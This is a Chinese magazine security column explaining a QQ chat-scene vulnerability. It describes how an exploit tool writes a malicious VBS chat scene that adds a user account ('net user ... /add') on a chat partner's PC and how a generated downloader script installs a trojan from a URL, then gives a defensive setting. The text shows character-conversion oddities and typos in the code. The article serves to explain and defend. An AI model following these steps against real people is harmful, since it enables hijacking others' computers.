ＱＱ聊天場景美 漏洞害人早預(yù)防

最近，武漢的熱心讀者薛義輝給我們“黑客戰(zhàn)線”欄目來信寫道：“最近聽說有個QQ聊天場景漏洞，傳播木馬很厲害，蠻嚇人的，但我在用QQ時沒有碰到過，貴欄目可否給我們介紹一下……”

其實(shí)，這個QQ聊天場景漏洞出現(xiàn)有一些時間了，雖然到現(xiàn)在為止它并沒有如一些媒體預(yù)言的那樣會給大家?guī)硌晷蕊L(fēng)，但其潛在的危害確實(shí)值得我們注意。應(yīng)這位熱心讀者的要求，本期“黑客戰(zhàn)線”就向大家剖析它!同時，也希望大家在安全方面有什么疑問、有什么難題，都給我們來信(郵箱：pcd2safely@gmail.com)，我們會盡最大力量解決它，謝謝!

QQ的安全—直是叫大家頭痛的問題。這不，前不久曝光的一個QQ聊天場景漏洞，就讓不少Q(mào)Q用戶對QQ那漂亮的聊天場景心生是懼。畢竟，誰也不想自己的電腦被黑客控制。

惡作劇——漏洞小試

這個漏洞是怎么被黑客利用的?下面我們先試驗(yàn)一下。運(yùn)行《黑鷹QQ場景漏洞利用工具》，在其“QQ路徑”中設(shè)置QQ的安裝目錄，接著在“VBS腳本”中設(shè)置腳本代碼。此工具自帶一段腳本代碼，我們完全可以直接使用它。但是為了讓該場景可以“為我所用”，還是對部分代碼進(jìn)行一些修改。

在代碼最后找到MsgBox這個消息函數(shù)。它最后的括號里是場景腳本在執(zhí)行后彈出的窗口信息文字。我們將此括號內(nèi)的文字改變功能，如下這段代碼的作用是在Q友的電腦中添加一個名為pcd的用戶。

dim objshell

set objshell=wscript.createOBject(“wscript shell”)

iReturn=obishell.Run(“net user pcd pcd/add”，O，TRUE)

設(shè)置完成后點(diǎn)擊“寫入”按鈕，這樣一個名為“QQODAY場景”的聊天場景就寫入到你的QQ目錄中。現(xiàn)在任找一個Q友，點(diǎn)擊聊天窗口工具欄里的“選擇聊天場景”按鈕，在彈出的窗口中點(diǎn)選“我的場景”標(biāo)簽，然后在其中找到這個名為“QQODAY場景”的聊天場景。當(dāng)選擇并執(zhí)行這個聊天場景后，它會先自動下載到這個Q友的電腦中，接著自動執(zhí)行場景中的腳本代碼，添加一個名為pcd的用戶。

種木馬——真實(shí)目的

剛才只是小試牛刀，黑客的最終目的是控制我們的電腦，因此他們會進(jìn)一步利用這個漏洞。剛剛提到過的VBS腳本代碼，就能幫黑客把木馬病毒文件從網(wǎng)上悄悄下載到我們的電腦中，從而控制我們的電腦。下面來看看這是如何實(shí)現(xiàn)的。

首先，運(yùn)行腳本生成器Script Dowmloader。然后在其“木馬網(wǎng)址”中填入木馬病毒的在線鏈接，在“保存路徑”中設(shè)置下載到本地的路徑(根據(jù)自己需要來選擇“加密的VBS”或“未加密的VBS”)。最后，點(diǎn)擊“生成”按鈕即可生成惡意腳本文件。這樣的惡意腳本文件容量不到2KB，可以說是短小精悍，使用方便。

用“記事本”分別打開惡意腳本文件和場景目錄中的VBScript.qqs文件。復(fù)制惡意腳本文件中的所有代碼，替換掉VBScript.qqs文件中MsgBox這部分代碼，然后保存。現(xiàn)在按照開始講過的方法，將修改后的惡意聊天場景發(fā)給QQ友。當(dāng)其QQ收到這個惡意聊天場景后，其電腦就會被木馬“攻陷”，成為黑客手中的獵物。

巧設(shè)置——QQ防護(hù)

正所謂：多行不義必自斃。當(dāng)黑客在給別人發(fā)送聊天場景的時候，該場景也會同時在自己的系統(tǒng)中運(yùn)行。不過黑客那邊的事兒我們管不了，我們管好自已的QQ就是了。

首先，在QQ聊天窗口中點(diǎn)擊工具欄上的“選擇聊天場景”按鈕。然后，在“我的場景”標(biāo)簽中點(diǎn)擊“我的場景設(shè)置”鏈接，把彈出窗口里的“接受場景邀請”前面的鉤去掉就可以啦!當(dāng)然，現(xiàn)在還有好幾種手工或利用安全軟件來進(jìn)行防護(hù)的方法，但限于篇幅在此就只介紹這種最簡單的方法了。

編后語：由于此漏洞的利用十分簡單，是菜鳥黑客的最愛，所以為了避免無辜者受害，我們就不提供文中相關(guān)工具的下載了，抱歉!